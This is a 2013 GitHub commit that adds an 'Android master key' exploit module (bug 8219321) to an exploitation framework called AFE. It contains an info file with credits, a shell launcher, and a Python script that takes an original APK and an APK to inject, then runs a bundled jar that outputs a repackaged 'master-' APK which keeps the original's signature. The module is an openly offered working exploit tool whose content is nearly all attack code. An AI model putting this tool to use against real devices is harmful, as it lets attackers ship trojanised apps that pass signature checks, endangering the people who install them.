Included Android Masterkey Vulnerability

to run this module follow: Afe/menu/modules$ run androidmasterkeys Credits: Afe/menu/modules$ info androidmasterkeys
appknox · Jul 22, 2013 · a57caa5 · a57caa5
1 parent ddb324c
commit a57caa5
Show file tree

Hide file tree

Showing 4 changed files with 118 additions and 0 deletions.
diff --git a/bin/AndroidMasterKeys.jar b/bin/AndroidMasterKeys.jar
diff --git a/modules/androidmasterkeys/androidmasterkeys.info b/modules/androidmasterkeys/androidmasterkeys.info
@@ -0,0 +1,8 @@
+This is a POC example for Android bug 8219321 (master keys):
+
+Well Written Explanation by Al Sutton (https://plus.google.com/113331808607528811927/posts/GxDA6111vYy)
+
+Credits: https://gist.github.com/poliva/36b0795ab79ad6f14fd8 (Pau Oliva)
+         https://github.com/Fuzion24/AndroidMasterKeys/ (Ryan Welton)
+
+Issue: https://github.com/xysec/AFE/issues/3 (@anantshri)
diff --git a/modules/androidmasterkeys/masterkey.py b/modules/androidmasterkeys/masterkey.py
@@ -0,0 +1,99 @@
+#!/usr/bin/python
+#----------------------------------------------------------------------------------------------#
+#Android Framework for Exploitation v-2                                                        #
+# (C)opyright 2013 - XYS3C                                                                     #
+#---Important----------------------------------------------------------------------------------#
+#                     *** Do NOT use this for illegal or malicious use ***                     #
+#              The programs are provided as is without any guarantees or warranty.             #
+#---Defaults-----------------------------------------------------------------------------------#
+import os
+import glob
+import shutil
+import commands
+import subprocess
+import time
+import logging
+import signal
+import sys
+def signal_handler(signal, frame):
+	logging.warn("\nYou pressed Ctrl+C! dont forget to clean the TEMP file !")
+	print "Wait 5 seconds"
+	time.sleep(5)
+	sys.exit(0)
+signal.signal(signal.SIGINT, signal_handler)
+################################################################################################
+#                                 MAIN SCREEN                                                  #
+################################################################################################
+
+print """
+---- The Android Framework For Exploitation v2.0  ----
+ _______  _______  _______                _______     _______ 
+(  ___  )(  ____ \(  ____ \    |\     /|  / ___   )   (  __   )
+| (   ) || (    \/| (    \/ _  | )   ( |  \/   )  |   | (  )  |
+| (___) || (__    | (__    (_) | |   | |      /   )   | | /   |
+|  ___  ||  __)   |  __)       ( (   ) )    _/   /    | (/ /) |
+| (   ) || (      | (       _   \ \_/ /    /   _/     |   / | |
+| )   ( || )      | (____/\(_)   \   /    (   (__/\ _ |  (__) |
+|/     \||/       (_______/       \_/     \_______/(_)(_______)
+"""
+print "Copyright Reserved : XYS3C (Visit us at http://xysec.com)"
+print"----------------------------------------------------------------"
+print "Files Available in the Input Folders:"
+print "----LIST----"
+os.chdir("../../Input")
+tmp = os.getcwd()+"/../temp"
+bin = os.getcwd()+"/../bin"
+outputpath = os.getcwd()+"/../Output"
+if not os.path.exists(tmp+"/masterkey"):
+	os.makedirs(tmp+"/masterkey")
+masterkeydir = tmp+"/masterkey"
+
+types = ('*.apk', '*.zip')
+
+for files in types:
+	for filest in glob.glob(files):
+		print "* " + filest
+
+origapp = raw_input("Enter the name of the original apk/zip: ")
+print "********************************"
+
+while not os.path.isfile(origapp):
+	print "APK/ZIP not found, try again !"
+	print "----LIST-----"
+	for files in types:
+		for filest in glob.glob(files):
+			print "* " + filest
+	origapp = raw_input("Enter the name of the original apk/zip: ")
+
+if os.name == 'nt':
+	os.system('cls')
+else:
+	os.system('clear')
+
+
+print "Files Available in the Input Folders to Inject:"
+print "----LIST----"
+for files in types:
+	for filest in glob.glob(files):
+		if filest != origapp:
+			print "* " + filest
+
+injapp = raw_input("Enter the name of the apk you want to inject: ")
+print "********************************"
+
+while not os.path.isfile(injapp) or injapp == origapp:
+	print "APK not found, try again !"
+	print "----LIST-----"
+	for files in types:
+		for filest in glob.glob(files):
+			if filest != origapp:
+				print "* " + filest
+	injapp = raw_input("Enter the name of the apk you want to inject: ")
+
+shutil.copy(injapp,masterkeydir)
+shutil.copy(origapp,masterkeydir)
+
+subprocess.call(['java', '-jar', bin+'/AndroidMasterKeys.jar', '-a', masterkeydir+"/"+origapp, '-z', masterkeydir+"/"+injapp, '-o', outputpath+"/master-"+origapp])
+print "Output APK in -> " + outputpath+"/master-"+origapp
+
+
diff --git a/modules/androidmasterkeys/run.sh b/modules/androidmasterkeys/run.sh
@@ -0,0 +1,11 @@
+#!/bin/bash
+#----------------------------------------------------------------------------------------------#
+#Android Framework for Exploitation v-1                                                        #
+# (C)opyright 2010 - XYS3C                                                                     #
+#---Important----------------------------------------------------------------------------------#
+#                     *** Do NOT use this for illegal or malicious use ***                     #
+#              The programs are provided as is without any guarantees or warranty.             #
+#---Defaults-----------------------------------------------------------------------------------#
+clear
+(cd ./modules/androidmasterkeys/ && python masterkey.py )
+exit